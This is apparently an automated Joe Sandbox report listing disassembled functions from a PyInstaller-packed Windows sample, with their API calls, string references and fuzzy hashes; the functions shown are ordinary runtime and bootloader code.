abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2429D2
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA2429D9

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction ID: 5eb730a58a0f455b046cd3b06578bb4a433d0dc306ea917f36e8c233b1cfe7be
Opcode Fuzzy Hash: cf0ce418dbf8095189d4875bbd922365259c44d693191a2e82a2bfde5589004d
Instruction Fuzzy Hash: 17518E32E0AA4381FA65DB1A965463C6394FF54FC4F1A84B6DF4E06795DF2CE842E320

Function 00007FF8BA2429FC Relevance: 12.1, APIs: 8, Instructions: 148COMMON

Download Yara Rule

APIs

abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242AB6
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242AD5
__AdjustPointer.LIBCMT ref: 00007FF8BA242B16
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242B23
__AdjustPointer.LIBCMT ref: 00007FF8BA242B5F
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242B74
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242BB9
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF8BA242BC0

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: abort$AdjustPointer
String ID:
API String ID: 1501936508-0
Opcode ID: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction ID: 72ddbded6492c9c4ddf1e819fea62d245303afc2435e7f9d09cb327740514549
Opcode Fuzzy Hash: 33b9a28e85c1583a9e53f416898540066328f1663c9e5eff4cdc8514e51169f9
Instruction Fuzzy Hash: CE518F21E0AB5381FA69DF1A954463867A6EF44FC0F0984BADF4D0A785DF2CE442E710

Function 00007FF8BA2457C0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF8BA245889
_local_unwind.LIBVCRUNTIME ref: 00007FF8BA24592C

Strings

csm, xrefs: 00007FF8BA24596F
MOC, xrefs: 00007FF8BA245802
RCC, xrefs: 00007FF8BA24580E
csm, xrefs: 00007FF8BA245824

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: FileHeader_local_unwind
String ID: MOC$RCC$csm$csm
API String ID: 2627209546-1441736206
Opcode ID: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction ID: a6c3ec370df7c86fd29db42ee54ec4c4dd997a1d82bd784b4f241ea599061e7d
Opcode Fuzzy Hash: 48d146a85fba6cc68383d4a357e19a92ddcb549a58e0a70336f33e234ca841ed
Instruction Fuzzy Hash: 09517B72A08A1386EB609F29914137D26A0FF84FE4F1410B6EF8D57795CF3CE885E641

Function 00007FF8BA24E51C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24E590
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24E59F

Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C83D
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24C876
Part of subcall function 00007FF8BA24C7AC: DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24CBA2

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24E63F
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24E64F
DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24E6FB

Strings

{for , xrefs: 00007FF8BA24E5C8

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: {for
API String ID: 2943138195-864106941
Opcode ID: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
Instruction ID: d6fe34f5e25427f51c98e05f42ca0429391c0c2d5c01aa6414fdfed6fcb81e5e
Opcode Fuzzy Hash: 1d198ef7d00c42b7b5d6345a2de299b4b6d6df6816ee118919713e1a20d08d6c
Instruction Fuzzy Hash: B4513872A08A86A9F7119F28D5453E837A1FB44B88F8480B1EF5C07B95DF7CE654D740

Function 00007FF8BA24DB20 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMONLIBRARYCODE

Download Yara Rule

APIs

atol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF8BA24D237), ref: 00007FF8BA24DBE4
DName::DName.LIBVCRUNTIME ref: 00007FF8BA24DC03

Strings

void, xrefs: 00007FF8BA24DB66
`template-parameter, xrefs: 00007FF8BA24DC11

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: NameName::atol
String ID: `template-parameter$void
API String ID: 2130343216-4057429177
Opcode ID: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
Instruction ID: fe53591c253668d39f1b9ad9e464665f1ba73981ef47207002489c61f8250812
Opcode Fuzzy Hash: 99e8a3aeda194b23daaeb8e320394810a7e422b566c05f224998a45ae8f9928a
Instruction Fuzzy Hash: FA415722F18B5698FB018BA8D8512BC23B1BF08BC8F9441B6DF0C67A99DF7CA545D340

Function 00007FF72B8DDCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD4D
GetLastError.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD5B
LoadLibraryExW.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDD85
FreeLibrary.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDDF3
GetProcAddress.KERNEL32(?,?,?,00007FF72B8DDF7A,?,?,?,00007FF72B8DDC6C,?,?,?,00007FF72B8DD869), ref: 00007FF72B8DDDFF

Strings

api-ms-, xrefs: 00007FF72B8DDD6D

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction ID: e693363df6aa2b10b3ae530858529ad6ece208eeb382e53cbb69a837ecadc5e5
Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
Instruction Fuzzy Hash: 0531FB21B1A74392EE11BB2A9C006B5A3D4FF59BA0FD94536DD1D473A0EF3CE4548BA0

Function 00007FF8BA2488FC Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FF8BA248748: Replicator::operator[].LIBVCRUNTIME ref: 00007FF8BA2487C7

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA2489AE

Strings

,..., xrefs: 00007FF8BA24897C
void, xrefs: 00007FF8BA248A20
<ellipsis>, xrefs: 00007FF8BA2489FB
..., xrefs: 00007FF8BA2489EB
,<ellipsis>, xrefs: 00007FF8BA24898C

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 1405650943-2211150622
Opcode ID: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
Instruction ID: fb6e3a34973e0cf7796157e69a78286920c87749c42cd84df0ed9b3b10ad0958
Opcode Fuzzy Hash: 2d64ae1c8566e52113f7ea7f0519ec7cc2fdd75a0b800f0bfe5adc2fd519a96a
Instruction Fuzzy Hash: A94126B2E28B8698F7158F68D9402BC37A0BB08B88F5845B1DF8C16794DF7DA545E701

Function 00007FF8BA24A704 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::operator+.LIBVCRUNTIME ref: 00007FF8BA24A7F5

Strings

short , xrefs: 00007FF8BA24A787
unsigned , xrefs: 00007FF8BA24A7C9
char , xrefs: 00007FF8BA24A790
long , xrefs: 00007FF8BA24A769
int , xrefs: 00007FF8BA24A778

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: Name::operator+
String ID: char $int $long $short $unsigned
API String ID: 2943138195-3894466517
Opcode ID: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
Instruction ID: 15826f1871b5b2b3da3f0ab365bcb94e94db91e2b047e854e2a25ec0a8570380
Opcode Fuzzy Hash: d3dd5d4b7b7d9da7287822680feab4e52e9236e75075d12403fdf1d6dd1a2c6b
Instruction Fuzzy Hash: 92313872E18A5689F7128B2DC8543BC27B0BB09B98F5481B5CF0C16AA9DF3DE544E750

Function 00007FF72B8D2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF72B8D351A,?,00000000,00007FF72B8D3F1B), ref: 00007FF72B8D2AA0

Strings

WARNING, xrefs: 00007FF72B8D2AAF
Warning, xrefs: 00007FF72B8D2B1E
Warning [ANSI Fallback], xrefs: 00007FF72B8D2B0F
[PYI-%d:%s] , xrefs: 00007FF72B8D2AA8
0, xrefs: 00007FF72B8D2B16

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction ID: 62befc1430bc7d7a69f93e8c897353565319eaedfcca201569f155e8dbfa2ee9
Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
Instruction Fuzzy Hash: E221867261878252E710AB69F8417E6A394FF887C4FC00136FE8C53669DF3CD1558B90

Function 00007FF72B8D8570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF72B8D8590
OpenProcessToken.ADVAPI32 ref: 00007FF72B8D85A3
GetTokenInformation.ADVAPI32 ref: 00007FF72B8D85C8
GetLastError.KERNEL32 ref: 00007FF72B8D85D2
GetTokenInformation.ADVAPI32 ref: 00007FF72B8D8612
ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B8D862E
CloseHandle.KERNEL32 ref: 00007FF72B8D8646

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID:
API String ID: 995526605-0
Opcode ID: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction ID: 71f44a326e59ec410575eb33a50ac39e9248a5811487a74ae60791e88661f75e
Opcode Fuzzy Hash: fa90e23b90d603ff8a1fc3170628a297920662056bab6e12f28c88f429b12389
Instruction Fuzzy Hash: F0212421A0C64341EA50AB69F94422EE7A0EB95FB0FD40236E66D436F4DE6CE4558F50

Function 00007FF72B8EB150 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72B8EB15F
FlsGetValue.KERNEL32 ref: 00007FF72B8EB174
FlsSetValue.KERNEL32 ref: 00007FF72B8EB195
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1C2
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1D3
FlsSetValue.KERNEL32 ref: 00007FF72B8EB1E4
SetLastError.KERNEL32 ref: 00007FF72B8EB1FF

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction ID: 7620a577f740ce63c8e4d07ac11d9a7073508ed7ec623c02ad5ae9e7b5b1336d
Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
Instruction Fuzzy Hash: 0E212120E0C6C281F594B3AD5D91239E196DF44BB0F948634F97D46AF6DE3CB4614FA0

Function 00007FF72B8F7D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF72B8F7D9D
GetLastError.KERNEL32 ref: 00007FF72B8F7DA9
CloseHandle.KERNEL32 ref: 00007FF72B8F7DC1
CreateFileW.KERNEL32 ref: 00007FF72B8F7DEC
WriteConsoleW.KERNEL32 ref: 00007FF72B8F7E0B

Strings

CONOUT$, xrefs: 00007FF72B8F7DCD

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction ID: da80ebf678fd8bba726a7d3e8d9d80a4dd4805a2fa9df1011e6f8dd57eff2770
Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
Instruction Fuzzy Hash: 07119631B18A4186F750AB5AEC54339A2A4FBA8FE4F800634D95D877B4DF7CE4548B50

Function 00007FF72B8D8ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8EFD
K32EnumProcessModules.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8F5A

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D8FE5
K32GetModuleFileNameExW.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D9044
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D9055
FreeLibrary.KERNEL32(?,FFFFFFFF,00000000,00007FF72B8D3FA9), ref: 00007FF72B8D906A

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction ID: bfd2f43db7651d105a4971550c791567a0a83e9d577e9b2c8b89981c417e2af4
Opcode Fuzzy Hash: 51e73ccb600dcf9d750c353d1e93921ada3daf916e275faff0d4d54491eeaa6f
Instruction Fuzzy Hash: 8841A761A1968381EA30AB26BC002BAB394FB85BD4FC44536DF4D577A9DE3CE510CF50

Function 00007FF8BA246570 Relevance: 9.1, APIs: 6, Instructions: 84stringCOMMON

Download Yara Rule

APIs

__unDName.LIBVCRUNTIME ref: 00007FF8BA2465C6
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA246609
strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF8BA246633
InterlockedPushEntrySList.KERNEL32 ref: 00007FF8BA246650
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA24665C
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8BA246665

Memory Dump Source

Source File: 00000002.00000002.2032000025.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true

Associated: 00000002.00000002.2031974581.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032072332.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2032096151.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8ba240000_iqA8j9yGcd.jbxd

Similarity

API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
String ID:
API String ID: 3741236498-0
Opcode ID: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
Instruction ID: f412dda8245b7aac8c1e7597ae235ba24be2e590e72d8a61350936e25e884d9c
Opcode Fuzzy Hash: 15fe56e746848034ceae3c74ae24cd98c02c43889dad90caa4cb656d1d360567
Instruction Fuzzy Hash: B931B322B19B9290FF15DF2AA9145696394FF08FD4B5986B5DF2D03784EE3DE442D300

Function 00007FF72B8D90E0 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D8570: GetCurrentProcess.KERNEL32 ref: 00007FF72B8D8590
Part of subcall function 00007FF72B8D8570: OpenProcessToken.ADVAPI32 ref: 00007FF72B8D85A3
Part of subcall function 00007FF72B8D8570: GetTokenInformation.ADVAPI32 ref: 00007FF72B8D85C8
Part of subcall function 00007FF72B8D8570: GetLastError.KERNEL32 ref: 00007FF72B8D85D2
Part of subcall function 00007FF72B8D8570: GetTokenInformation.ADVAPI32 ref: 00007FF72B8D8612
Part of subcall function 00007FF72B8D8570: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF72B8D862E
Part of subcall function 00007FF72B8D8570: CloseHandle.KERNEL32 ref: 00007FF72B8D8646

LocalFree.KERNEL32(?,00007FF72B8D3C55), ref: 00007FF72B8D916C
LocalFree.KERNEL32(?,00007FF72B8D3C55), ref: 00007FF72B8D9175

Strings

S-1-3-4, xrefs: 00007FF72B8D9121
D:(A;;FA;;;%s)(A;;FA;;;%s), xrefs: 00007FF72B8D9142
Security descriptor string length exceeds PYI_PATH_MAX!, xrefs: 00007FF72B8D9183
D:(A;;FA;;;%s), xrefs: 00007FF72B8D9157

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PYI_PATH_MAX!
API String ID: 6828938-1529539262
Opcode ID: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction ID: 905cb40e80bbe9a60eab84154667caae38cb272563dd436cefb3332e392bd35e
Opcode Fuzzy Hash: 0222097b9c90264a1a2c87a2a2fde68e1a94831f5278aced0db9eca26447961c
Instruction Fuzzy Hash: 2D212121A1874291FA10BB24EC153EAA265FF98780FC44536EA4D437A6DF3CE9558BE0

Function 00007FF72B8EB2C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B8E4F11,?,?,?,?,00007FF72B8EA48A,?,?,?,?,00007FF72B8E718F), ref: 00007FF72B8EB2D7
